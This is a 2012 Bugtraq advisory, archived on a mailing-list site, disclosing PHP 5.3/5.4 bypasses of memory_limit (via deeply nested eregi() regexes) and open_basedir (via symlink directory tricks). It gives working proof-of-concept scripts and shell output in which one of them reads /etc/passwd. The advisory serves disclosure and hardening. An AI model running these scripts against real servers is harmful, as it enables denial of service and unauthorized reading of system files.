lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201203301305.q2UD5tFn027886@sf01web2.securityfocus.com>
Date: Fri, 30 Mar 2012 13:05:55 GMT
From: cxib@...ecurity.com
To: bugtraq@...urityfocus.com
Subject: PHP 5.4/5.3 deprecated eregi() memory_limit bypass

[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/ 
Date: 30.03.2012

Original link:
http://cxsecurity.com/issue/WLB-2012030272

PoC's:
memory_limit poc
http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc
http://cxsecurity.com/issue/WLB-2012030270


--- 1. PHP memory_limit bypass ---
Functions based on POSIX Regular Expression eg. eregi, are deprecated since PHP 5.3. In last version 5.4.0 we may still use these functions. It allow us to bypass memory_limit in PHP.

eregi() function based on POSIX regexp, otherwise preg_match() based on PCRE. This is the main difference between these functions.

POSIX Regex Functions Tutrial
http://lu.php.net/manual/en/ref.regex.php

PCRE Functions Tutrial
http://lu.php.net/manual/en/ref.pcre.php

In last year, we have published a fix for regcomp()/libc function from NetBSD source. eregi() use the same source code what in libc of netbsd. In result, we may exhaustion memory limit or stack in PHP

See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

Script presented below, show how to use eregi() to exhaustion memory in PHP

- http://cxsecurity.com/issue/WLB-2012030271 --
<?
/*
PHP 5.4 5.3 memory_limit bypass exploit poc
by Maksymilian Arciemowicz http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com

To show memory_limit in PHP

# php /www/memlimpoc.php 1 35000000
PHP Fatal error:  Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12

and try this 

# php /www/memlimpoc.php 2

memory_limit bypassed
*/

ini_set("memory_limit","32M");

if($argv[1]==1)
	$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
	eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");

?>
- http://cxsecurity.com/issue/WLB-2012030271 --

Remember. Don't use memory_limit as a main memory limiter.


--- 2. PHP open_basedir bypass ---
PHP latest version, 5.4.0 brought many changes. safe_mode has been removed but open_basedir is still available for use. We don't need look for new ways to bypass open_basedir. The problem with symlinks is still available in PHP. 

safe_mode tutrial
http://php.net/manual/en/features.safe-mode.php

PoC:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www)
in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127# 

open_basedir will disallow /etc/passwd. 

Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
..

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.

PoC:
http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as a main security feature.


--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271

PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70

open_basedir bypass poc
http://cxsecurity.com/issue/WLB-2012030270


--- 4. Contact ---
Author: Maksymilian Arciemowicz
Email: max {AA\TT cxsecurity |D|0|T] com
http://cxsecurity.com/
http://cxsecurity.com/cvemap/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ